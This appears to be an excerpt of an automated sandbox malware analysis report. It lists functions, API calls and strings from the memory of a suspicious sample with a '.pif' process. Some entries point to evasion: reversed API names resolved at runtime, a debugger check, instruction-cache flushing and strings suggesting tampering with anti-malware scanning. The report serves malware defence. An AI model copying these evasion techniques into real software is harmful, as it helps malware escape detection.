Opcode Fuzzy Hash: dfa83fec632fe41dd6c3a2bd626237ec2e6557758161166ba56d14ceb3db1979
Instruction Fuzzy Hash: 00A11730A042768BDB219A2CCCA4BD9B7F5FB49718F1440E5ED499B381CB758AC5CF52

Function 02CA252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

, xrefs: 02CA2814
7, xrefs: 02CA26A1
Unexpected Memory Leak, xrefs: 02CA28C0
The unexpected small block leaks are:, xrefs: 02CA2707
An unexpected memory leak has occurred. , xrefs: 02CA2690
bytes: , xrefs: 02CA275D
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02CA2849

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 7d8df90b64eef6e22e2cd0a3bec79428974fbed5c4605065d400a11bd80b4a21
Instruction ID: 41ed2c4079e3d4efbde6b951447d24961ffdfbe8793e2a37bb828e0d593c3072
Opcode Fuzzy Hash: 7d8df90b64eef6e22e2cd0a3bec79428974fbed5c4605065d400a11bd80b4a21
Instruction Fuzzy Hash: DD71D370A042B98FDB219A2CCC94BD9BAF5FF49708F1040E5E949DB281DB758AC5CF52

Function 02CAAE44 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02CAACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CAACD9
Part of subcall function 02CAACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CAACFD
Part of subcall function 02CAACBC: GetModuleFileNameA.KERNEL32(02D007F8,?,00000105,?,?,00000105), ref: 02CAAD18
Part of subcall function 02CAACBC: LoadStringA.USER32(00000000,02CA6814,?,00000100), ref: 02CAADAE

CharToOemA.USER32(?,?), ref: 02CAAE7B
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02CAAE98
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CAAE9E
GetStdHandle.KERNEL32(000000F4,02CAAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CAAEB3
WriteFile.KERNEL32(00000000,000000F4,02CAAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CAAEB9
LoadStringA.USER32(00000000,02CA678C,?,00000040), ref: 02CAAEDB
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02CAAEF1

Strings

PRQx7, xrefs: 02CAAE6C

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID: PRQx7
API String ID: 185507032-1054095891
Opcode ID: df563127878e20e9e2943040039f3587dba75563cb6c771286383825b9078d66
Instruction ID: 225ec0109f38f29da32ddcd0d179cf196a9fb2db4b72a9b4283b7017303c2cdc
Opcode Fuzzy Hash: df563127878e20e9e2943040039f3587dba75563cb6c771286383825b9078d66
Instruction Fuzzy Hash: C311C2B25542067ED600EBA4CCA0F9F77EDAB44308F540A2AB350D60D0DA71E904DF62

Function 02CA58B4 Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrcpyn.KERNEL32(?,?,?), ref: 02CA5918
lstrcpyn.KERNEL32(?,?,0000005C,kernel32.dll), ref: 02CA597C
lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 02CA59B2
lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 02CA5A17
lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 02CA5A23
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 02CA5A45

Strings

\, xrefs: 02CA59F5
GetLongPathNameA, xrefs: 02CA58DF
kernel32.dll, xrefs: 02CA58CC

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: lstrcpyn$lstrlen
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 4046762626-1565342463
Opcode ID: 2a3a06494f8b9998e66ec7554324acc69e68d3d80a4c6bcac7128f6806600756
Instruction ID: 423a13c737ca05c03182c0c0227615c40189f50f699113923977223f06a4984f
Opcode Fuzzy Hash: 2a3a06494f8b9998e66ec7554324acc69e68d3d80a4c6bcac7128f6806600756
Instruction Fuzzy Hash: 2C415E71E4025AAFDB10DAE8CC98AEEB3BDAF48358F4885A5A149D7241D770DF44CF50

Function 02CABD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02CAC00B,?,?,00000000,00000000), ref: 02CABD76

Strings

AMPM, xrefs: 02CABF8A
AMPM , xrefs: 02CABF99
m/d/yy, xrefs: 02CABE45
:mm, xrefs: 02CABFA9
:mm:ss, xrefs: 02CABFC6
mmmm d, yyyy, xrefs: 02CABE72

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: LocaleThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 635194068-2493093252
Opcode ID: d3598947e4ca5aa71f33e73fa0d2b1c1786f0902f6a5869589273458fd84aeba
Instruction ID: 6fa5e46c19c6d33c5dbe2eb406c564df71e380230edf3e063456321299dc63c8
Opcode Fuzzy Hash: d3598947e4ca5aa71f33e73fa0d2b1c1786f0902f6a5869589273458fd84aeba
Instruction Fuzzy Hash: 44611F34B4014AABDB14FBA4D8B0B9F77BBAB88308F1094359102DB345DA35DE05AB94

Function 02CBAE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02CBAE38
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02CBAE4F
IsBadReadPtr.KERNEL32(?,00000004), ref: 02CBAEE3
IsBadReadPtr.KERNEL32(?,00000002), ref: 02CBAEEF
IsBadReadPtr.KERNEL32(?,00000014), ref: 02CBAF03

Strings

KernelBase, xrefs: 02CBAE4A
LoadLibraryExA, xrefs: 02CBAE45

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: ad8d229fda07ac5f2687bd332dca1cbe0557dd2c01e59e11b1c80a95d5782358
Instruction ID: 51613d3bf277bb8ad4752f08bd6ae865852626f17973c977b1c5cda600cc95de
Opcode Fuzzy Hash: ad8d229fda07ac5f2687bd332dca1cbe0557dd2c01e59e11b1c80a95d5782358
Instruction Fuzzy Hash: 1A3161B5A40345BBEB21DF69CC85FDA77ACEF04768F144510FA949B280D331EA50DBA0

Function 02CA432C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CA43F3,?,?,?,?,?,?,?,02CA449E,02CA2CF3), ref: 02CA4365
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CA43F3,?,?,?,?,?,?,?,02CA449E), ref: 02CA436B
GetStdHandle.KERNEL32(000000F5,02CA43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CA43F3), ref: 02CA4380
WriteFile.KERNEL32(00000000,000000F5,02CA43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CA43F3), ref: 02CA4386
MessageBoxA.USER32(00000000,Runtime error at 00000000,02CCD754,00000000), ref: 02CA43A4

Strings

Runtime error at 00000000, xrefs: 02CA435E, 02CA439D

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Runtime error at 00000000
API String ID: 1570097196-1393363852
Opcode ID: 788225bb0fe6becfa9f4d3aa12f57fadceb21ddb3de6eee16a23d03ee46a5ece
Instruction ID: 80c11a280525e99c5832ee24e7d968aa14a085348cc8d9e35c04cd5875c594c4
Opcode Fuzzy Hash: 788225bb0fe6becfa9f4d3aa12f57fadceb21ddb3de6eee16a23d03ee46a5ece
Instruction Fuzzy Hash: 6CF02460AC130679FB24A3A0AC66F69235C4780F2CF280B39F329A40D4A7F050C0EB23

Function 02CAE50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02CAE5A5
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02CAE5C1
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02CAE5FA
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02CAE677
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02CAE690
VariantCopy.OLEAUT32(?,00000000), ref: 02CAE6C5

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 64ad64c3195a2b266e732bc1d787a2588087a1c16bed5c34222ee16cb595d48a
Instruction ID: b38eab62dc6a6ada9c260755b4ab2bfc5d20e8ad335b655a9165c011780d2059
Opcode Fuzzy Hash: 64ad64c3195a2b266e732bc1d787a2588087a1c16bed5c34222ee16cb595d48a
Instruction Fuzzy Hash: 2751EE7590062E9BCB21DF58CCA0BD9B3BDAF4D318F0445E5E609A7201DA30AF859FA4

Function 02CAAA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02CAAC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02CAAAAF

Strings

eeee, xrefs: 02CAABBE
ggg, xrefs: 02CAAB95
yyyy, xrefs: 02CAABA5

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: LocaleThread
String ID: eeee$ggg$yyyy
API String ID: 635194068-1253427255
Opcode ID: 5efadc481efe1234a2a66418131be6ed1c0906504b5c106bd168a6b65f6278b2
Instruction ID: 1a28989bcdd307180de0bb00b9a16371e5d811a4c02584714674facfeae116fb
Opcode Fuzzy Hash: 5efadc481efe1234a2a66418131be6ed1c0906504b5c106bd168a6b65f6278b2
Instruction Fuzzy Hash: EE41247070495B4BE725FB7988B03BEB3FBEB8520CB604525D062C7304EBA9DE05DA21

Function 02CBE2EE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON

Download Yara Rule

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CBE42E

Strings

OpenSession, xrefs: 02CBE3D0
ScanBuffer, xrefs: 02CBE377
Initialize, xrefs: 02CBE31E

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: d347f8a93ca321cd1a6ef0e30820588c000a3c1fce1431d235f27466c6923945
Instruction ID: 5a16b353a853fd0308d926a80200a2fb9605cb73cc6c7415bbbee0f6a2fc8be4
Opcode Fuzzy Hash: d347f8a93ca321cd1a6ef0e30820588c000a3c1fce1431d235f27466c6923945
Instruction Fuzzy Hash: F3411C31B5010A9BEB25EBE4D850ADEB3FAEF98718F614435E041E7244DAB4AD01DF50

Function 02CBE2F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON

Download Yara Rule

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CBE42E

Strings

OpenSession, xrefs: 02CBE3D0
ScanBuffer, xrefs: 02CBE377
Initialize, xrefs: 02CBE31E

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 519e37149d89fa7015c3a51b63998eb48083001644e568cfeea231d9333d1473
Instruction ID: b47b7689ed903e51c1ad4aa3fddba30328b81ba224bb9cd82c63f99d8f2f96ef
Opcode Fuzzy Hash: 519e37149d89fa7015c3a51b63998eb48083001644e568cfeea231d9333d1473
Instruction Fuzzy Hash: B5411D31B5010A9BEB25EBE4D850ADEB3FAFF98718F614435E041E7244DAB4AD01DF50

Function 02CB80C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CB8113
GetProcAddress.KERNEL32(?,?), ref: 02CB8125

Strings

Kernel32, xrefs: 02CB8108
sserddAcorPteG, xrefs: 02CB80DB

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc
String ID: Kernel32$sserddAcorPteG
API String ID: 190572456-1372893251
Opcode ID: 17180160efa5b8acfa55910091131b64f484bbf6484d826cde132f0ca22187b2
Instruction ID: c4385586043657b59e9b96264f09c50f3a4dee480736b69389fa18dd96cf08d5
Opcode Fuzzy Hash: 17180160efa5b8acfa55910091131b64f484bbf6484d826cde132f0ca22187b2
Instruction Fuzzy Hash: 24018B78A41308AFEB11EBA4DC91A9E77AEEB88704F518424E405D7B50DA70AD009A20

Function 02CBEB8C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02CBEF90,UacInitialize,02CFCF00,02CCAFD0,UacScan,02CFCF00,02CCAFD0,ScanBuffer,02CFCF00,02CCAFD0,OpenSession,02CFCF00,02CCAFD0,ScanString), ref: 02CBEB92
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02CBEBA4

Strings

KernelBase, xrefs: 02CBEB8D
IsDebuggerPresent, xrefs: 02CBEB9E

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: f00ad782b3f05ce4a55f06f25944d04f2a44e41941a1cde8d73b22389aeb6c31
Instruction ID: 4095c5bbb2aa9899419e771899e65542765802c3d5cc1bcc13550ac6b761afcd
Opcode Fuzzy Hash: f00ad782b3f05ce4a55f06f25944d04f2a44e41941a1cde8d73b22389aeb6c31
Instruction Fuzzy Hash: 3ED012613513201DF90175F80CD8CDD02CDCD4592DBB80EB0B123D20D1E57688112515

Function 02CAC3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02CCC10B,00000000,02CCC11E), ref: 02CAC3FA
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02CAC40B

Strings

GetDiskFreeSpaceExA, xrefs: 02CAC405
kernel32.dll, xrefs: 02CAC3F5

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 96c1111f902a1d5e35b9e19e2b23c8f3a67d49120e7e02e2974395ec24696fa8
Instruction ID: e064890efea295106ac72c0503d3a6747319de37b2503ca24d98cd4afd3b4640
Opcode Fuzzy Hash: 96c1111f902a1d5e35b9e19e2b23c8f3a67d49120e7e02e2974395ec24696fa8
Instruction Fuzzy Hash: BBD0C7A1E883035EFB00AFB568B573A26DC9B4474DF645D36E01395103D77186145F98

Function 02CAE168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02CAE217
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02CAE233
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02CAE2AA
VariantClear.OLEAUT32(?), ref: 02CAE2D3

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 8aa00cc61b707ac15c9433f3790f772ad147275ad2ddf2cbfec09d81ee21ca74
Instruction ID: dd96a6d5b6b24305fc35322afa9c21c3f9b93e0855e9efa0e59828367af75304
Opcode Fuzzy Hash: 8aa00cc61b707ac15c9433f3790f772ad147275ad2ddf2cbfec09d81ee21ca74
Instruction Fuzzy Hash: 8541F075A0162A9FCB61DB58CCA4BD9B3FDAF49318F0041E5E649E7211DA34AF809F90

Function 02CAACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CAACD9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CAACFD
GetModuleFileNameA.KERNEL32(02D007F8,?,00000105,?,?,00000105), ref: 02CAAD18
LoadStringA.USER32(00000000,02CA6814,?,00000100), ref: 02CAADAE

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 27e5501fb3837a3b36842194d7451439c4ed997dab228b71795a0b84da46b0bf
Instruction ID: cd901aa69d1e6d309c1a7e61ec6ac01fc78302e05372d237c6ddaa949cc5e213
Opcode Fuzzy Hash: 27e5501fb3837a3b36842194d7451439c4ed997dab228b71795a0b84da46b0bf
Instruction Fuzzy Hash: 39414A70E402599BDB21EB68CC94BDAB7FDAB48308F0440E9A548E7341DB759F88DF50

Function 02CAACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CAACD9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CAACFD
GetModuleFileNameA.KERNEL32(02D007F8,?,00000105,?,?,00000105), ref: 02CAAD18
LoadStringA.USER32(00000000,02CA6814,?,00000100), ref: 02CAADAE

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 8bba8fccdbb0544cfd9fab8a4ef5c84e8f5d7f7ca63bbe33a4dbf3a53fd18a0a
Instruction ID: 3eece18513175e43b26749ac15ddb93736a753790cecd233c57c8825ca8781b9
Opcode Fuzzy Hash: 8bba8fccdbb0544cfd9fab8a4ef5c84e8f5d7f7ca63bbe33a4dbf3a53fd18a0a
Instruction Fuzzy Hash: 3A415B70E402599BDB21EB68CC94BDAB7FDAB48308F0400E5A548E7341DB75AF88DF50

Function 02CAA9D0 Relevance: 6.0, APIs: 4, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02CAAA67,?,?,00000000), ref: 02CAA9E8
GetThreadLocale.KERNEL32(00000000,00000004,00000000,02CAAA67,?,?,00000000), ref: 02CAAA18
GetThreadLocale.KERNEL32(00000000,00000003,Function_0000991C,00000000,00000000,00000004,00000000,02CAAA67,?,?,00000000), ref: 02CAAA41
EnumCalendarInfoA.KERNEL32(Function_00009958,00000000,00000000,00000003), ref: 02CAAA4C

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: LocaleThread$CalendarEnumInfo
String ID:
API String ID: 1139405593-0
Opcode ID: 3b1c5412da17833b9e24e9438e595235f0eed0001dc7f36b3a73abfe8c16c848
Instruction ID: a7952447f1571c5b18ae17888448b4315dd8e5939630c3c60d5cdae0fc4a474a
Opcode Fuzzy Hash: 3b1c5412da17833b9e24e9438e595235f0eed0001dc7f36b3a73abfe8c16c848
Instruction Fuzzy Hash: 4401F7312802476BFB01A6788D32B6E73ADDB4571CFA50130F512E66D0E6749E00EE64

Function 02CA1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03bc0a47881ec3ad0800eecf39c236e27c7d3f457c83551463244291d157c4b0
Instruction ID: c4a299e7af71b3e598055099593bd583c9dcf70b2e469b4cf7c8ee87585d5d23
Opcode Fuzzy Hash: 03bc0a47881ec3ad0800eecf39c236e27c7d3f457c83551463244291d157c4b0
Instruction Fuzzy Hash: 5DA109767106420BE719AA7C9CA43BDB3C69BC436DF1C427ED21DCB381EBE9CA419650

Function 02CA946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02CA955A), ref: 02CA94F2
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02CA955A), ref: 02CA94F8

Strings

yyyy, xrefs: 02CA94CD

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 206de03cb7777548cf861aa08d0f0c2404ee9bcea63eb1e24c787aa464b1dd7c
Instruction ID: 5ea8f03afea88599d5638045631a47ca701930eb835d1727ccb5227915e630b9
Opcode Fuzzy Hash: 206de03cb7777548cf861aa08d0f0c2404ee9bcea63eb1e24c787aa464b1dd7c
Instruction Fuzzy Hash: 4E21B071A002199FDB24DFA8C8A2AAEB3F9EF48714F5000A5F905E7240D770DF40EBA1

Function 02CA3568 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?), ref: 02CA35D3

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 02CA3580
FPUMaskValue, xrefs: 02CA35B4

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: Close
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3535843008-4173385793
Opcode ID: bc5cdd107a7c7be1ad7f529d6977e5119dbd94a61ab1bb9762efb3b145ce15e0
Instruction ID: ff069a92d57ec4e7aba8001ec5753efe51c90cacd33b7e6ac07a00272ce1a6ad
Opcode Fuzzy Hash: bc5cdd107a7c7be1ad7f529d6977e5119dbd94a61ab1bb9762efb3b145ce15e0
Instruction Fuzzy Hash: F901F5B5940259BAE711DB948C22BBDB3FCE708714F2006B5FA05D3580E674D610DB58

Function 02CB8184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02CB8018: GetModuleHandleA.KERNELBASE(?), ref: 02CB806A

Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CB8113
Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(?,?), ref: 02CB8125

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CB820E), ref: 02CB81F0

Strings

FlushInstructionCache, xrefs: 02CB819D
Kernel32, xrefs: 02CB81CF

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc$CacheFlushHandleInstructionModule
String ID: FlushInstructionCache$Kernel32
API String ID: 1384192982-184458249
Opcode ID: 492494a55d926762345cc83244e200936ed33cde35e741466e8cad116c018da4
Instruction ID: aeb60b4aa009dbfeaa18863a57c73d20ee900facef7bfc246b970d51bf942d80
Opcode Fuzzy Hash: 492494a55d926762345cc83244e200936ed33cde35e741466e8cad116c018da4
Instruction Fuzzy Hash: 2901DC74A84308BFEB12EFA4EC91F9A37EEEB48B00F614560B504D3A40C670ED10AB21

Function 02CB8018 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CB8113
Part of subcall function 02CB80C0: GetProcAddress.KERNEL32(?,?), ref: 02CB8125

GetModuleHandleA.KERNELBASE(?), ref: 02CB806A

Strings

AeldnaHeludoMteG, xrefs: 02CB8031
KernelBASE, xrefs: 02CB8051

Memory Dump Source

Source File: 00000004.00000002.1839275438.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ca1000_Pumyophn.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 667068680-1952140341
Opcode ID: bbfb0e25cfd5754943114f19208e10dda38d668db18db048390bc11f3128a0c0
Instruction ID: 8704f097af802a956eb401c99820209e1f901a2fa45c8d29146264592f7edfce
Opcode Fuzzy Hash: bbfb0e25cfd5754943114f19208e10dda38d668db18db048390bc11f3128a0c0
Instruction Fuzzy Hash: 0BF06270644308AFEB16EBA4EC51A9A77ADEB49780F914661F40093A10DA70AD109A50

Analysis Process: nhpoymuP.pifPID: 7688, Parent PID: 7584COMMON

Execution Graph

Execution Coverage:	8%
Dynamic/Decrypted Code Coverage:	65.1%
Signature Coverage:	0.5%
Total number of Nodes:	631
Total number of Limit Nodes:	57

Executed Functions

Function 27A85FA8 Relevance: 5.3, Strings: 4, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 27A860A2
,bq, xrefs: 27A86128
(o^q, xrefs: 27A860B0
,bq, xrefs: 27A8611A

Memory Dump Source

Source File: 00000007.00000002.2966177544.0000000027A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 27A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27a80000_nhpoymuP.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
